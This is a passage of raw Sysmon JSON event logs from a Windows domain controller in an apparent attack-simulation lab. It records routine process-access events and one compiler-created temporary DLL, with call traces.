{A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5141,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5142,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5143,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5144,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5145,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5146,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001056E40900}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001056E40900}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5147,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:43.140\r\nProcessGuid: {A837DB8D-032B-5F25-0000-001073E00900}\r\nProcessId: 2984\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\4ioguru5.dll\r\nCreationUtcTime: 2020-08-01 05:52:43.031","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:43.140","ProcessGuid":"{A837DB8D-032B-5F25-0000-001073E00900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4ioguru5.dll","CreationUtcTime":"2020-08-01 05:52:43.031","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5148,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
